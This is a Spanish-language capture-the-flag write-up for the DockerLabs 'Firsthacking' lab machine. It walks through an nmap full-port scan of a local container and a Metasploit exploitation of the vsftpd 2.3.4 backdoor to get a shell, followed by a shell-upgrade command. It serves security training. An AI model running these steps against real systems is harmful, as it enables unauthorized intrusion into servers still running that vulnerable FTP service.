> For the complete documentation index, see [llms.txt](https://red-shenlong.gitbook.io/red-shenlong/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red-shenlong.gitbook.io/red-shenlong/dockerlabs/muy-facil/firsthacking.md).

# Firsthacking&#x20;

## Alternativas

**Formato Video:** *Proximamente...*

{% embed url="<https://youtu.be/HcjESOGp2gQ?si=UsMJQxVGsNoveyql>" %}

**Formato pdf:**

{% @github-files/github-code-block url="<https://github.com/RedShenlong/DockerLabs/blob/36a2bb395d170f2df0f29ab930130e345c074031/Muy_Facil/Firsthacking.pdf>" %}

## WriteUp

Una vez desplegada la maquina haremos un escaneo de puertos abiertos con nmap.

En mi casa utilizo el siguiente comando:

```
nmap -p- -sS -sC -sV --min-rate 5000 -n -vvv -Pn 172.17.0.2
```

* **`-p-`**: Escanea todos los puertos .
* **`-sS`**: Realiza un escaneo sigiloso (SYN Scan) para detectar puertos abiertos.
* **`-sC`**: Ejecuta scripts predeterminados para recopilar más información del sistema.
* **`-sV`**: Detecta las versiones de los servicios en ejecución.
* **`--min-rate 5000`**: Acelera el escaneo enviando al menos 5000 paquetes por segundo.
* **`-n`**: No realiza resolución DNS, trabaja directamente con direcciones IP.
* **`-vvv`**: Muestra información detallada y actualizaciones constantes durante el escaneo.
* **`-Pn`**: Salta el "ping" previo y fuerza el escaneo, incluso si el objetivo no responde.

una vez realizado el escaneo vemos que tenemos un puerto puerto abierto

<figure><img src="https://943778647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTHP0DGttsg8xPkS6VPvy%2Fuploads%2FkB7XWwHI3mt2mqXg36il%2Fimage.png?alt=media&amp;token=26d5b233-58a1-4ad5-8809-bed3421e0305" alt=""><figcaption></figcaption></figure>

Es el puerto 21, como no tenemos ninguna informacion buscamos en metasploit para ver si es vulnerable por lo que abrimos metasploit con: `msfconsole` y buscamos alguna vulnerabilidad de vsftpd 2.3.4 con: `search vsftpd 2.3.4`

<figure><img src="https://943778647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTHP0DGttsg8xPkS6VPvy%2Fuploads%2FEtgSMzSK4RQVS2s75zhh%2Fimage.png?alt=media&amp;token=d7bec4fe-31d0-4437-8fbd-3c34c6c4ba3b" alt=""><figcaption></figcaption></figure>

Vemos que si existen una vulnerabilidad por lo aue utilizaremos la opción 0 que es la única que hay. Luego veremos las opciones que nos muestra con el comando : `show options` y vemos que solo nos pide la ip de la maquina victima que se la facilitaremos con `set RHOSTS 172.17.0.2`

<figure><img src="https://943778647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTHP0DGttsg8xPkS6VPvy%2Fuploads%2FKi2EAhyQNBG4ouVMxnIV%2Fimage.png?alt=media&amp;token=97506680-4e00-4dc0-b8df-4eaba4f61b12" alt=""><figcaption></figcaption></figure>

Ponemos `run`  para ejecutarlo.

<figure><img src="https://943778647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTHP0DGttsg8xPkS6VPvy%2Fuploads%2F0bSFS6FonnMwn48heYNs%2Fimage.png?alt=media&amp;token=3e8b11b2-121e-4d54-929e-b864c55eb896" alt=""><figcaption></figcaption></figure>

Y ya estaríamos dentro, yo lo que hago por comodidad es introducir el comando:

```
script /dev/null -c bash
```

Para que sea mejor estéticamente.
